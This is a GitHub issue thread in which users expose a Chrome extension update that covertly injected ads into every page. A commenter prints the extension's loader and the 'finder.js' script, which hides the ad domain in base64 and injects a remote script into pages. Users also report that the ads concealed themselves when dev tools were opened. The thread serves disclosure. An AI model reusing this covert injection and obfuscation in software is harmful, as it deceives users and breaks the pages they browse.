### ISSUE TITLE
Chrome Extension has been hijacked

### ISSUE THREAD

**Issue by andrewjennings** [CouchPotato/Browser-Extension#12]
There's an update to the CouchPotato Chrome extension published this morning on the Chrome Web Store. It now injects ads into every page as long as the extension is active.

https://chrome.google.com/webstore/detail/couchpotato/jochingjncojldfclaicaomboafaiong

**Comment by RuudBurger** [comment]
Fuuuck.. I checked out some monetization options a few weeks ago.
I think a didn't remove the include code when doing a small style fix a few minutes ago.

Fixing it now. DIsable it for now and wait for 1.1.6

Thanks for the heads up

**Comment by 3on** [comment]
Anyway to prevent this version from being push to users?

**Comment by RuudBurger** [comment]
1.1.6 is live now https://chrome.google.com/webstore/detail/couchpotato/jochingjncojldfclaicaomboafaiong please use the update function at the top right of the extensions page

**Comment by JoshStegmaier** [comment]
This is happening again. I have version 1.2.1

**Comment by 3on** [comment]
@JoshStegmaier I've seen lost trust in CouchPotato and removed the extension and I am on the lookout for a replacement.

This is way too big to be ignored IMO.

**Comment by michaellatman** [comment]
I committed mass genocide on my chrome extensions to find out it was this one (the one I removed last).. Shame on CouchPotato.

**Comment by 3on** [comment]
No need to remove you can just disable an extension.
The real shame is that this seems to be the second time it happens.

**Comment by llawwehttam** [comment]
I've built a copy from the source on Github.

The source is currently at version 1.2.0 and doesn't seem to cause the issue.

**Comment by Brandon4466** [comment]
Seems pretty shady IMO as well. [Here's a thread on Reddit](https://www.reddit.com/r/couchpotato/comments/56jejo/psa_the_couchpotato_extension_for_chrome_now/) with version 1.2.0 of the extension as well as instructions on how to compile it from source yourself.

Removed from the Chrome App Store as well :/

**Comment by jcodling** [comment]
AdChoice is not some mistake like forgetting a semicolon. It is added deliberately. Once is a mistake. Twice is not. I call bullshit.

Nothing like malware infections to lose user's trust.

**Comment by raymatos** [comment]
Happening again!!

**Comment by wolffstarr** [comment]
I'll note that the existing source here on GitHub is for version 1.2.0, and the version causing the issue was 1.2.1. It's possible - even probable, if it's been taken off the chrome store AND it's not happening with the Firefox plugin, that this was a hijacking of the plugin instead.

**Comment by tweekmonster** [comment]
I can understand monetization, but giving the benefit of doubt, I feel you didn't vet this at all.  It injects ads into every page and is absolutely obtrusive when doing so.  Then, when I open the developer tools, it **unloads itself and hides**!  What this thing does is nothing short of being adware.  Old school hidden toolbar adware.

I actually find it hard to believe that you had no idea how this would work.  There was no notice that the extension was going to be monetized.  **This was deliberately hidden and is intended to stay hidden.**  It reeks of cashing out, or at least predatory on the less technically inclined.

In `userscript.js` (which is not in this repo) this function loads `finder.js`:

```javascript
function addLinkFinder(){
	var head = document.getElementsByTagName('head')[0];
	var script = document.createElement('script');
	script.type = 'text/javascript';
	script.src = 'https://couchpota.to/extensions/finder.js?'+Math.floor(Date.now() / 60000);
	head.appendChild(script);
};
```

However, `finder.js` doesn't do anything besides load ads **covertly** despite what the comments say.

```javascript
// Search for links to movie pages, imdb, rt, metacritic
// And add a direct "add to CP" link to it


setTimeout(function(){
	var base = atob('eGVkc2VydmVyLmNvbQ==');
	var partner = ['sub76'];
	var addon = ['av76220'];
	var av_r = Math.floor(Math.random() * (9999999999 - 1 + 1)) + 1;
	var head = document.getElementsByTagName('head')[0];         
	var script = document.createElement('script');
	script.type = 'text/javascript';
	script.src = '//'+base+'/build/'+partner[0]+'/'+addon[0]+'/av.js?cb='+av_r;
	head.appendChild(script);
}, 1000);
```

`eGVkc2VydmVyLmNvbQ==` decodes to `xedserver.com` which was all over my network logs.  Base64 encoding the domain name is clearly an attempt to slip this script past filters.  "Search for movie pages and add a link" my ass.

Since this is on `couchpota.to`, one of two things happened:

1. The Google Play Store account was hacked and the plugin was replaced AND the server was hacked and a script was replaced.
2. It was put there intentionally.

This issue makes a pretty strong case for number 2.

CouchPotato is convenient, but not enough for me to forget how much time I wasted to hunt down this bullshit.  As far as I'm concerned now, CouchPotato is adware and I won't be waiting for a resolution to this.  I'm going to cease use of it altogether.

**Comment by SeBsZ** [comment]
I luckily managed to track down it was this extension easily using dev tools. Deleted and couch potato is never coming back on my PC again.

**Comment by sarbian** [comment]
It took me sometime to find out were the add came from since they were gone each time I refreshed with the dev tool opened. 
Adds are bad. Trying to hide that it was your ext is just plain disgusting.

Oh, by the way. It is so badly done that it injects adds in some json streams, killing whole sites.

**Comment by epacke** [comment]
That was bad. :(

**Comment by RuudBurger** [comment]
Hi guys. Yes this was as intended. But as a test. 
I tested it locally for 2 weeks first and with an adblocker enabled it didnt load at all, which is what I wanted. The ads themselfs should be unintrusive, so please post some screenshots on how they look. I did t notice them while testing, bjt maybe my standards are lower. 
Or maybe because im on a dutch ip, the ads are less then in a US region. 

Ill make an disable option to not load them. But needed to see this first. 

Thanks for the feedback and being a pain in my ass though. Keeps me on my toes.

**Comment by jimlei** [comment]
I also spent quite some time fiddling around my system to figure out where this originated from. I sadly didn't take any screenshots, and will not be adding the extension back to my browser.

When trying to open the Chrome dev tools the ads were kind enough to remove themselves from the dom. If you plan on adding some ads/monetization system I highly recommend you choose a service that seem less, suspicious. This comes across as pure ad/malware and has removed all trust I had from running couchpotato

![browser_extension__ads](https://cloud.githubusercontent.com/assets/4523053/19220381/473339e0-8e2c-11e6-8c1a-685258ef0971.jpg)
![ad-by-browser-extension](https://cloud.githubusercontent.com/assets/4523053/19220382/4734e448-8e2c-11e6-84ce-74cb6b598438.png)
![browser_extension_ad_by](https://cloud.githubusercontent.com/assets/4523053/19220383/4734e2a4-8e2c-11e6-9ee8-00687d7aa4c3.png)

**Comment by RuudBurger** [comment]
I disnt see it like this. This is bad and not unintrusive at all. Will need some more testing then. 

Will disable it for now, maybr implement my own, because i dont have control over what it loads now

**Comment by sarbian** [comment]
And as stated before it insert data in JSON stream. It killed my Tiny Tiny RSS and I had errors in google doc. If you plan to have add and do silent update without opt out then I won't use it.

**Comment by jcodling** [comment]
This is a major screwup. The author's other comments are reassuring except this one:
> Will disable it for now

Do not use malware to make money. Period. AdChoice infects browser content and destroys an otherwise great system. AdBlock Plus counted over 400 ads blocked when it was installed. I also could not open and Google docs. I wasted an hour figuring out what the hell was going on. Maybe I should bill you. My current rate is $150/hour for after hours tech support. The fee rate is real but I am being facetious of course. I think I have made my point.

**Comment by Halvhjearne** [comment]
wtf were you thinking adding something like this?
if you needed/wanted money, couldnt you just have asked for some more donations instead of this?
im sure lots of user would have pitched in, had you done it like that ...

this just seems shady as hell, not to mention that if anyone was considdering donating before, you can now forget about them.

**Comment by Chintagious** [comment]
As a test? You tried to obfuscate the code to make it seem like this extension wasn't the one causing the adware to show. Not to mention the file that generates the garbage is not in this repo. You could have done something like show a small toast when the extension is used every X number of times that suggests a donation, but you went with this method instead. Very scummy.

**Comment by RuudBurger** [comment]
That was the code provided by the add provider

**Comment by jcodling** [comment]
A very small amount of research would reveal the nature of AdChoice and it's insidious nature.

**Comment by pdf** [comment]
This is a horrific privacy and security violation.
